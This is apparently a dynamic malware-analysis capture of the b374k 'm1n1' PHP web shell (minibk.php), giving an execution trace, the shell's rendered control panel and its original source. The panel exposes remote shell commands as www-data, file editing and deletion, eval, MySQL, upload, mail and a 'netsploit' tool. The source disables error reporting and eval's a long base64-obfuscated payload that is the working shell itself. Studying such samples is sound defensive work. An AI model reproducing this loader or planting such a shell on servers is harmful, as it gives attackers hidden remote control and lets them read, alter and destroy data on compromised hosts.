4 159 0 0.014600 708360 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'prepend.php'
5 160 0 0.014613 708360 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 160 1 0.014628 708456
5 160 R 'prepend.php'
4 159 1 0.014642 708360
4 159 R 'prepend.php'
4 161 0 0.014656 708776 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'prepend.php'
5 162 0 0.014670 708776 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 162 1 0.014684 708872
5 162 R 'prepend.php'
4 161 1 0.014698 708776
4 161 R 'prepend.php'
4 163 0 0.014711 708776 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'prepend.php'
5 164 0 0.014724 708776 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 164 1 0.014738 708872
5 164 R 'prepend.php'
4 163 1 0.014751 708776
4 163 R 'prepend.php'
4 165 0 0.014764 708904 ukuran 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
5 166 0 0.014778 708904 filesize 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
5 166 1 0.014794 708968
5 166 R 57
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $size = 57
4 165 1 0.014818 708928
4 165 R 57
4 167 0 0.014831 708928 get_perms 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
5 168 0 0.014845 708928 fileperms 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
5 168 1 0.014860 708968
5 168 R 33261
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $mode = 33261
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'x'
4 167 1 0.014986 708968
4 167 R 'rwxr-xr-x'
4 169 0 0.015000 709056 filemtime 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
4 169 1 0.015015 709096
4 169 R 1676242137
4 170 0 0.015028 709056 date 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 2 'd-M-Y H:i' 1676242137
4 170 1 0.015068 709384
4 170 R '12-Feb-2023 17:48'
4 171 0 0.015084 709184 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'prepend.php'
5 172 0 0.015099 709184 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 172 1 0.015114 709280
5 172 R 'prepend.php'
4 171 1 0.015128 709184
4 171 R 'prepend.php'
4 173 0 0.015142 709184 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'prepend.php'
5 174 0 0.015156 709184 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 174 1 0.015170 709280
5 174 R 'prepend.php'
4 173 1 0.015184 709184
4 173 R 'prepend.php'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $buff .= '<tr><td><a id="prepend.php_link" href="?y=/var/www/html/uploads/&view=/var/www/html/uploads/prepend.php">prepend.php</a> <form action="?y=/var/www/html/uploads/" method="post" id="prepend.php_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="prepend.php" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value="prepend.php" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class='
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $buff .= '</table>'
3 45 1 0.015237 704832
3 45 R ' <form action="?y=/var/www/html/uploads/&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tr><td>www-data $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr> </form> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="/var/www/html/uploads/" /> <t'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $buff = ' <form action="?y=/var/www/html/uploads/&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tr><td>www-data $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr> </form> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="/var/www/html/uploads/" /> <t'
2 8 1 0.015422 712624
1 3 1 0.015449 554400
0.015482 462736
TRACE END [2023-02-12 20:49:23.858380]
Generated HTML code
<html><head><title>:: b374k m1n1 1.01 ::</title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = 'none'; document.getElementById(baru).style.display = 'block'; } </script> <style type="text/css"> body{ background:#000000;; } a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; } #menu{ background:#111111; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; } #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .main { width:100%; } .gaya { color: #4C83AF; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-size:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF; } .explore tr:hover{ background:#111111; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:none; padding:0;margin:0; } </style> </head> <body onload="document.getElementById('cmd').focus();"> <div class="main"> <!-- head info start here --> <div class="head_info"> <table><tbody><tr> <td><table class="b_tbl"><tbody><tr><td><a href="?"><span class="b1">b<span class="b2">374</span>k</span></a></td></tr><tr><td>m1n1 1.01</td></tr></tbody></table></td> <td>Apache/2.4.52 (Ubuntu)<br>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64<br>uid=33(www-data) gid=33(www-data) groups=33(www-data)<br>server ip : 127.0.0.1 <span class="gaya">|</span> your ip : ::1<br>safemode <span class="gaya">OFF<span><br> > <a href="?y=/"> / </a><a href="?y=/var/">var / </a><a href="?y=/var/www/">www / </a><a href="?y=/var/www/html/">html / </a></span></span></td> </tr></tbody></table> </div> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?y=/var/www/html/">explore</a> <a href="?y=/var/www/html/&x=shell">shell</a> <a href="?y=/var/www/html/&x=php">eval</a> <a href="?y=/var/www/html/&x=mysql">mysql</a> <a href="?y=/var/www/html/&x=phpinfo">phpinfo</a> <a href="?y=/var/www/html/&x=netsploit">netsploit</a> <a href="?y=/var/www/html/&x=upload">upload</a> <a href="?y=/var/www/html/&x=mail">mail</a> </div> <!-- menu end --> <form action="?y=/var/www/html/&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tbody><tr><td>www-data $ </td><td><input onmouseover="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value=""><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;"></td></tr> <form action="?" method="get" style="margin:8px 0 0 0;"></form> <input type="hidden" name="y" value="/var/www/html/"> <tr><td>view file/folder</td><td><input onmouseover="this.focus();" id="goto" class="inputz" type="text" name="view" style="width:400px;" value="/var/www/html/"><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;"></td></tr> </tbody></table><table class="explore"> <tbody><tr><th>name</th><th style="width:80px;">size</th><th style="width:210px;">owner:group</th><th style="width:80px;">perms</th><th style="width:110px;">modified</th><th style="width:190px;">actions</th></tr> <tr><td><a href="?y=/var/www/html/">.</a></td><td>LINK</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rwxrwxrwx</td><td style="text-align:center;">12-Feb-2023 17:48</td><td><span id="titik1"><a href="?y=/var/www/html/&edit=/var/www/html/newfile.php">newfile</a> | <a href="javascript:tukar('titik1','titik1_form');">newfolder</a></span> <form action="?" method="get" id="titik1_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="y" value="/var/www/html/"> <input class="inputz" style="width:140px;" type="text" name="mkdir" value="a_new_folder"> <input class="inputzbut" type="submit" name="rename" style="width:35px;" value="Go !"> </form></td></tr> <tr><td><a href="?y=/var/www/">..</a></td><td>LINK</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rwxrwxrwx</td><td style="text-align:center;">12-Feb-2023 17:48</td><td><span id="titik2"><a href="?y=/var/www/html/&edit=/var/www/newfile.php">newfile</a> | <a href="javascript:tukar('titik2','titik2_form');">newfolder</a></span> <form action="?" method="get" id="titik2_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="y" value="/var/www/html/"> <input class="inputz" style="width:140px;" type="text" name="mkdir" value="a_new_folder"> <input class="inputzbut" type="submit" name="rename" style="width:35px;" value="Go !"> </form> </td></tr><tr><td><a id="beneri.se_malware_analysis_link" href="?y=/var/www/html/&view=/var/www/html/beneri.se_malware_analysis">beneri.se_malware_analysis</a> <form action="?y=/var/www/html/" method="post" id="beneri.se_malware_analysis_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="beneri.se_malware_analysis" style="margin:0;padding:0;"> <input class="inputz" style="width:200px;" type="text" name="newname" value="beneri.se_malware_analysis"> <input class="inputzbut" type="submit" name="rename" value="rename"> <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('beneri.se_malware_analysis_link','beneri.se_malware_analysis_form');"> </form> </td><td>???</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rw-r--r--</td><td style="text-align:center;">12-Feb-2023 17:48</td> <td><a href="?y=/var/www/html/&edit=/var/www/html/beneri.se_malware_analysis">edit</a> | <a href="javascript:tukar('beneri.se_malware_analysis_link','beneri.se_malware_analysis_form');">rename</a> | <a href="?y=/var/www/html/&delete=/var/www/html/beneri.se_malware_analysis">delete</a> | <a href="?y=/var/www/html/&dl=/var/www/html/beneri.se_malware_analysis">download</a> (<a href="?y=/var/www/html/&dlgzip=/var/www/html/beneri.se_malware_analysis">gzip</a>)</td></tr><tr><td><a id="minibk.php_link" href="?y=/var/www/html/&view=/var/www/html/minibk.php">minibk.php</a> <form action="?y=/var/www/html/" method="post" id="minibk.php_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="minibk.php" style="margin:0;padding:0;"> <input class="inputz" style="width:200px;" type="text" name="newname" value="minibk.php"> <input class="inputzbut" type="submit" name="rename" value="rename"> <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('minibk.php_link','minibk.php_form');"> </form> </td><td>14.28 kb</td><td style="text-align:center;">osboxes<span class="gaya"> : </span>osboxes</td><td>rw-rw-r--</td><td style="text-align:center;">12-Feb-2023 17:48</td> <td><a href="?y=/var/www/html/&edit=/var/www/html/minibk.php">edit</a> | <a href="javascript:tukar('minibk.php_link','minibk.php_form');">rename</a> | <a href="?y=/var/www/html/&delete=/var/www/html/minibk.php">delete</a> | <a href="?y=/var/www/html/&dl=/var/www/html/minibk.php">download</a> (<a href="?y=/var/www/html/&dlgzip=/var/www/html/minibk.php">gzip</a>)</td></tr></tbody></table> </form></div> </body></html>Original PHP code
<?php
@error_reporting(0);
@set_time_limit(0);
$code = "7T35W+u2sr+/73v/g+vLLaGErGwhkJ4QEghbIAkJcE4/rmM7sYk3bGc9r//702ix5cRhOT1t770
t7QFbGo2k0WhmJI3G//s/ej+he57qJ9aeTqvtz+uKsf7LhvDjjwKfIPxwJIjixsZXYa2vG6pwJHC
ZRZI4R6mf4OFpoPpPsm35quV7CZy3URQ0VVJUNyFWSMaWP3PUA0FyHEOXJV+3rbQt+6q/5fmuKpl
iTAlDtQa+diCIKQSDXgjq+UYMqKJ7ju3pgBbV4fuSrJkovShACUsy1aMvopjqSR5+oW1MiV/EIlS
syppN+4Repjoq96ugGp66TKvBXHeW6EUSX6EZAeDoNpirlmwramIlAWM62QYK8gScbgHiL9afQ7z
UYP4a/RZpp5sDRDhEnU9270k2VMlKoKJrCqKGKQ10uWfbJoOdIUigVkhDXBol6RYkfkIE01Ep1dP
nqEFKaq0P8OrUR5nq1DGAtGv9pJgSw3T481m2RxZqEnrc2MoihJ/i2VRMQU2fRVM3VRHaEsIh6qh
bMFiubRwIzqiHhkPkIapTR3dVD5Aokq8mRFdMmkPUXjWRScJ/WfRfLpPPbGy8gtiUpluog0diKrG
b+Qn9n9v+aQ8XQNNFAVoH/WYUXxurLuqnmE1lsiLqtmf3/YnkAicieqnWOCG2qs1OtfnUatTa3XK
zCu3W+0Lik27pwIQJ0ZP66pOJyCduCLYrIN7xbcOeoAbGwmwIR6hCG3Egqg4lQyqqrt28qxbxDIo
k18qXrSo0bOb5qgnj6GjO0whzFW5JgqvPG/XQW4ICI7LlaW0THVeH/izURFJoJYvsNyPMh5I/6d6
TorssY6yrE5K35kyUkONIOqK3rGFolLnB5MIi7CwOEE+BH6BVpN4f1kYeHiBXcnQtoU4Ra0w0WzJ
1REfUIZorikUCrStRWF0hcDgdoNYc1zYdzNpQNiUKX9YEnI7bBpNEniiJjdRJvVmttBvNh6dW9ab
cLKNH1hPha1DxJyyFRq6LpsETpOH5iWvDIHEV/jjwi2GNiDMNR/K1BMw7JF2/QNaYm5KQlFwD8uD
ktfHnDCJc30YFZU1IuJI1QEBlMSk+oiGWPGHNUH1fdTegmUhAGNBMNnwkKyUeIKSUjzEMBiaZnpB
CpDqUBM1V+0iK/TxD84kv+EUsfRZEWjhIF0GUr40RIh4PfS4ywkXr8BzJEmRD8jxUz0CaSQg1V9d
hGgBKIiodKSf8cpiWStCEXxnL9EeWDLL4Cc1rD+kDEYTzFKaeMxkBE4DyWQ00cAeYU9CgQNLCHGF
pwVRUXSQ1nnSHMoBme35vRuT8E5EWn8Wzdvvm6azRamNRuGbOCHwAsN6sXjXa1afyyUkTS+mebim
O7fpYGuWzubzIJT45iEiQ08vvbQ8p93gcl8Swa5LOKvgzcg06ARDjJNZ09JIRgFOFQwH0gd3Hc9B
DAh4nb27iuY34cs6Xe2blnoXDIygNjzwsDDng+bz2/MuqKcTaE8dmGAvYGMAHBJH+C5ozYhwylA6
MIC5ozhtE9M/rLla8VEjZBhE8JAu9kTzUekudcDnojeV8cqnmRq1IAYIkeUIgG8XQWmFpuGO9UR+
rX6ZEEAv3XCFdwiMJeUAeIpu5LNR0kBjEEuIAdSWuvEi4T0DchFVuwIxAjbgJ9X90GgkzexQWw/y
40AimdTb42pgmisXduKbIAzxkxry3eK12GC0e9p5O+JT4o9XznCIITfJEGAMxUDGY0FTir/lgonx
FItUfuZbgu7oJyvHJVR1DkpGQpNUkRSRQMSzWOQEWzqSimEDE/QAiHmc9vYxsX/WeBo6c2ACJSSv
C0ICJvqM6dcdDXdVUj6KK1ONp9oRpvSTVD9gCBoZD/CO5rjQjht5iyh8t6ph+/Rn9HMAvyiqKhlJ
tR7UC7Y06MNGwhUWnBphcOFfRqBHBlBCx1b/S7n3+BaYMpEVWEE/9ANlGQJwo7K+In2xPZZVAkod
kZYLAonfyptA3LFxAZL9HZqIFFnTiUyAcUVmCA1Q9MybohEczD4lHU5AwzUNhhmSD+KNkOsXpEeI
Fw/giCiaoCwWBIEr76N3zZwasFUwJjYt1sO9MkYBF/xXR9BAOfamHaMlmjWwqPXvKFZroClqu7GT
+SaHd0qGvlChHHabRM7wf6pYz8gXburLRcDaQtEBFfU33Un1bHnmIrRBKXSEVoEdWHS6GlisCmPd
QBDEyeqOLGwIbbcl2JuNMAdtYMkaQjB7TrP4o2t7IDzEjs9XUfa7cqS38EFZFsuMq3Kf1oUpwb9O
IBEgnwGCUlsaEpz6aCG8SnzSbNlHTFUW1wjbNuNayocYNCYYBbGG8GkTNMdBq5RvGY2D79rsHBOp
7e0Qibf2TRga9AF+XFtgbT0tXDVlZK0E1CFqDl/gKSjBBV4DkshTGnliqezBw7ZHzBjZHdU1vBUy
WoUMKTe/rqrIKrkDhCOtRdJgAYvGT6ro2VklINunWIJHZKK4hMh6JPUkeKjZaP1ITb40scj0BBEw
NTekDYZi35hnhi8VlgpKN7HUIwBVppPB0qyjImuQio+hI9+yt/f2dwlYWFzZVhBX9QGGQ8EBmbBW
QFcoSDBifE9tVMAy8xMDcNS9xNmff3t5VW+2nu2Z9/ZeYAk21r7poWCKFsNXcrNaqzWoTSonFr6a
kGwmxj+RxSskgiqWyhf29TwNITsm2iVQ5Il8SUCcZVTaK2CAkQrwk5Dao1XuUKa7phzh5K1fEVm4
g0bHlioQ8NjhjLVeqIZkCgHkUrMOolsHLLzLdicqjL3gNjtZ3wtdgfQtamqhb0G54Pn2KanKyz4V
5l+EBg2UN8zEHjDU6AcZZEWBcHFqL1ec6sW5T8UsvZBmyJVeK1MIK8CvfACNZ3/7KWXtM9C1Z9UT
ilNaYJJRKgTS8rF9fsJdgIgEPb0mGPrAOZERtVA9ZEeC6YWFIC4spMM7wpCVWSJj3Fi6yzaRsXW0
9CGcHupjEBDTxlhMxaLh6CLmwTPZ1Xx9mEYpIJ6EE1vTIGvGDLqN1ASBNOZqDCtA3vHb9PyEs/iy
NJU9GJqN/4I+GkptYJ3WsJ+nDE0jNdVALGAdHQ2LYv63ouJZjZJxS8VSzN7Jm+rI6zBQdsOCswcF
vVIhxWmZJYWS3qcaIVW7mEFl5XA3SE6LEEyHFK7XE6zKKkyzwlhqS34lqTKrx0rz6UgJ5Hpqskan
+F57rWD7+EdMdV/TdZjzB9tqkz7096Wnff9O8z7F5n/ue8z7397z/rfNeCCe+yE2Sv8gkx6wkpuA
QykUoZTVoVUp8MnRriGi1pPQpSPzmHd5HZlKTbOkuL6MBTcyy+dXW/E6cTrcNo/xOOyi+hfz9EyK
XeW1C0B3KlY34bTOC4QwSvgmdLFmyanDoggTbkg1dHkKviMR7bQiRHHyN37BgjExPxKiI0b6bMZk
KK/wuKoZNYl7FvKIMXu37atKEOoMM4pLa4RVXX1EN1VcXpytMTZIT6u5A7P0arnn64ZoHtulgl25
kGMG2ONmn+1b5SA/03yMdGei/k2wk5/3LkjGgPezXHGGCYVOJWQi/SQTSSv9QAQiGzp8s/lgT/rO
FH8cxy/ObG9llwRdKsNFw5Ergt4LY6gNy63VZ+EFkrwtBwMWQCUsLiKhJzWYHvLzDfP4t9HyPtKT
CkrUqlJCrSxghNCKxYUsKwJODrMSqMuCgFJSDFyizsSCGOUFEt1NRMjuQgrzIkVPAF0RO49M+fa4
ybzTiEsTOWoLcwyMhm8ltbwR4IbVIvTkWoX4ioF+FADMSqpZCgdIYJpnbKAatFEnOsMdb068U5nA
soDB7gS8ARsNyyXkVRwbwCVmTTYV0cvGQbJ0cza7jsz3wuPJ8yfXh2O0TySFlw3MfgIm4oQEoSlM
tJfTWWhwTul2wVDlqm0yrhkdcV3LNVb2R4XtcpfQwnmhgmo11MHkG5RocopIk7mjyzVbA7q6vuaM
4IrC835UM+KDsiRLja1hHmM6qX8TIjbM/MnTqFJhkZ7n4L/Ej1K2+AUIK3PN2t58UFbsVBkfCeDM
ncNaEU06KSpyIhCx9pAYo/jmpYA597uPzyMCbM9IkyezpRmINpFGSAAh0h9jhqsHZoiuGx6k/9PH
5Y9/BNa8BjVMAD8erkJzE0w4qC6t3sIeCk4trPzRz4uo+hsslMcJI253cYtNRQ4DXHJf5eWC/E+y
JhTLAw4n4EiV+UE3Hn9HDUu6AHJ/EsyPUYKpHM93FWpnApBNh5BrUbpToAXPoXAl5RcGb6D60E7g
DoZdRtrA+mSDOXD/A7SX9WMcpG9ipBEqih60GPDPUG8UeIu6wyDAYM2saxYBTAMOWZ49cWQ0xlV5
DhMdsHRmelBcmqExyNbSKegPQXMUkDdds8zVBgkNbsdR8xFLeAh6S9vEeAOWimE6r7SgtXy0vI5g
FBDgpOhp2LApF7UtImB0I9D2UaQw0Iup5+4WbbeCMcoR1Hp+JGRvej9bXi/QRBCiBF34UMpntTGZ
D+FlYd6H961urwHIUbPI6WJaCTV8HQ7W+p1JU63sqRbW+q9LM9rsqzeTeVWkmu1ApGzYMXYzR2fQ
nqrp56y3q5xNx8RHEpPjE3HuItxm4z4Ef3VMPqaMjsde51noFe1K9yTWmZ5vbjlbfvq5fl68zGel
hei51d01p+tJrXU6vTy5O9Pupfvkw7OYvThtOOj83Go69N60/7BXyz+O+sNk39i9at2O00Kk0c9d
tu+/uOPmeu691Te1+snt8WzAfyvuG+dzYvrufnRTs1q1U7hTKs9pN5bopbTrNStcfmLfueVW4SZ/
WtVH/dpDbLvRcZdsyn+1Cc3r8MrsujybdhjI20dPF+eZsYhzrrqY6su+OGka3cHWu+HN3+NzuXMx
qx9vZx0dBuWjXuxe9jGbfTcy7sjzxa/7uprlZvb/onHf85tlpuZLZG3fS6jwn9yfj+5bj6/LMH9o
PRmdg3Kf71/qoPD+p7nYuhXy733En23buJotk7s3cO3cbfbv5bBTkvtZ9Htclf94cX4+tvU1vx96
/8QuN8V1z3n3sFLaV2wEaukGmkp/cdi5GA+HuJVdr16znk/l4Wr53tGlBvr/tT93dG9nXLqt2el/
af9k/LlwOnOHtnt0YXFz1xtdqWzu78nqtRmO3UC9njMzOg3M/FM5O2vtnU7eTqW1f6vO7br+6eZV
rjZT+QNcfeo3rqd7y1Z47mNWf+y8n56eZvXJXL88fjuXCpT6+y191nNNaJzfNnm930ZJuWrb08cP
D/lmn5lVfurXNdH/POx7mrpu3F/JJOX3ue9WdqxOzUL073bzS5NrL0LnPnJnT095Lb6gct68MRTp
reneXwqNqn6iNVu147Kj9Sv9e6yPeGbSH4/PNZ/9Cb+6NL23t4aLy0so9mlfN5+3HncHtY7+lX/X
0Xf1lqFhnklut3j+MhrvC6MZvKyPTczNnle2XHdedX+v9zp5XyT9278yXzcuO0ZF2Gv3b57ZkPT7
cNjbv+thLlGd+xzgSHx/PtfZ+fVKtS+lhutx/HhqDVk4qbx7XzPOT46zc3RmetR5P5+2L3O3UMUe
5ifFgn6R77ui43td9JZ8fje9H43HXzQrX5n2zmz3pzvbO6qadyam9ppItXLxkK/VRJ3987XdP57e
P6iC/nTvRpvLDRK6Uz9RKt2JlByeN6kDPzs60y4f7eX8yEPzrlwt15KdnF+fX+t3xtjd80Ab5R1W
+qrYtw+xfXLjzbbtfu9/V8s3H8/zJnXlXk+y2N2/sPU/nNydeprHfUm6qt8MTQU1PvfRg+OBdF05
a2mmmJU+q5+X70/LL6ahvKi857aJWscxRtv48bg6ds12tmq6MJjue3G9L3XKjUy04VzvdK3t0lRE
uW5cXhbOrvDO6cq41Z8/df6x1d7afBzuT++nOw+Pl7d3s4r4znyh394+b7bxuPtidguLtnb9cN6r
GbfvZmt7I+8Om27GFsdTNyzuO1Mrues+P9u5Luzq6vbjL3jXSzZZVOz+VpIFc6/Se79qVF7XxmHv
Rn68vu3P3ZP+mreZz9wU0I8ZXmd7z6bGwqalyv3FbM9rbd/Jla2jWs7L6kO+4zsXVrKB07yqdynG
/bdze7zYms/0j7LMmyUMw1S1V9o/E/mOt2dq/mtTq9/3jtHfTbU1y2p1rvcxuKpmKc5K/aPnjFy1
z33Rkr5q9GNoXtfS93vYr9c6uP9rZ2XzcL8wedrqZli8M/dPjfUnXPMe96Q47xxfewMpK45155Tq
r3556jfF2rScNd52ueT24S5/f3Va2e3mjeZc/bu41ai9yTXP8KyRhc/vPQis30Tojo9I3Ktfj+84
snb7Y7V8q3fpm60ZWh2jitoxpfdq2mookn7SqZau8O3g8bx6fXjlab1LJjy6uJ/tl7b568Sg8S/m
6KRsP0kDbzVqF84teu6yN9qp27zp/29s2n7vp3szNHLcsOX+Sr3YHL+pe/7KRnWjOjol0wKZ/diV
fnzmnd82J0PaGY0cp5DbdqX1RVRzFHT9qg2PVSqtTJIHyVjWX3dbbOwggXZnk0zvP0ot2cVnQazV
ndHEjTeqXnevJ0dJogHa675z1pEF9Wj3L3KfriqY9Xt51a9l+9uGifqwatZf+47mh35m57p7d08/
PLy+7RrqwPcwV3K42q87lzcdc+9lpeapbFo4fZv529rxvKH2/M5Lzyl6z8FIwL+VTtVwd7uzuZrx
OWRrK2drtS+14+mJpw+OOUT8xCjvpfFfazvcd259VysfNwo4wnzvzh/JeRbp62ZlJd5WLbKf84Iy
cvXvp4dG5qWavy2792Dxuzgcdv/Ngn99eyc30cyc/vqhk3fruZNAyr9MWksp7O4K+mcvKzW3H6jx
07yTZ0Mfy1VV6Om6ePGszr3fWmShqprt5kZnMzwo9P//Qb97o1qBidCqWbu5J6cfReSVz3p7082W
hOTzJ9Jubx4X785y5u59/Tt84Nw9nNWnc3c5X5vN5d1ar93v1snasd3Xr+Kxib5fvW2bNmOqjm+N
8NZMe3KvPOhriB+F5Ij8MRvWymju9utafHwvPl9unDy/t1nGhPK6aZ6fPw7SZLWjZyun4xj6rP+y
Usw0t51fz93U125teTPb2Htozf7edqwm7/cLktHozRUNWG453Gi/utl/duXyoWvas3j+ZKGfy/UV
WN9x+Wbnr3dxcEq74uSQcar5plA7Boal06Ou+oZYODohrmGBmraxw+LOjOfQW2Rj2plGhg4PDNIE
VDsnWGNmlxDt16XDDTCzxS2XYOzOQCZ3sSe4ImVWKLY/gLhtsAVYNFR6PZ3UFw2yk8OZfCq6/GdI
MrcLWLdtSkVW3qhRGulyqZ9jycB0MtMM0aRS0GaD4Jsueh9ras5XZVwFmygDvCh38I4N/ilBcQoY
93oiEVbyL7/gdQJNw3oFmI9qgsrarqO5Wz/Z92zzIOlPBsw1dEf6xXdnPl2sA+9NXoY+WwluwoXS
QRSBF8t6XTN2YHbQlzUYk6qiuIllSsuzqkoGWNbZhuwf/qOEfwPIP1O9RtK1Z/FMUOCfTHPq3Tf4
GhQTpq8B2zCEvuw+ZwWZ6BGUO/xRX9Jt4zm+BrQzIopUEFOFbWID/iquplMc/AYBvO3G5vwopX+p
Zqv+VNTu7g6CkkW8LGfyHYTgQ4oubkm6h4aSOAZnMP3EqHNjAeh7Tmh+yFNmOjyc3rQlRjlEVE2J
lHxlN4/vIcoNKeyM/vl7KEqyVbABhvING8QyIfzjEZICSXD3vZuL4pnP0skc+nGYE4xMZk5gi/EB
oqj7QfOpQHDcZAzpnGF+niMP60oCCUHvSrb4dcrxACYRye1l+JuZxdeFRUkDfkG693DsKRPis9+T
3DCo2IucXkeHCnuBcr4IkSmcXEySek5Fshg4KeGc+SoAQIfE1j4ArrzKVjH9CFLuobhATURxaEv3
7xhmO6TghQ23ZrglCjsOt5ZL8C8isGCJycnR3YTAofWGQWPfjBBsvCAmFqHP4Ei/R9FfVQACEyfs
WCcLxwRLY0C11izJ/jvFogFALWThPB2MVDcMyZEILSX7MPqCpQkxurDSnPIMA4YgZ9reiANWTaqV
6HDAVm750aAK9xPq1T/vMTpGRgUDUOKVvOLqhssJaHZQ5HE5iG0Y4BC0u2NalLSlH4iprYR2JjPW
N4CIEHEkr+piev4qgHyDph60tfCFfwMTDBxToHVFkaytaIJA0wWWa0iG+iIBPMrnbByIWCWJp0at
R/Fks8e4DYi8rlnrRlJxYQmYZdSYYsgtxEccJhnaV5cZBsrsR4fkoB06OOn5muXwB9IY6vkQc1VI
40kAetgMIzQJy6WhIIB3IFPScq1hkHl1QuViiDEj8Fd6E529AiSX852MlUSaqcyx9sJg5815Qhfj
PhyskTEMfPlYaWUBofti6D26b9PFjGEYOHHyIJfL3g72WdOg0+k3KcVyBRx4YAo87RrN443+6EKc
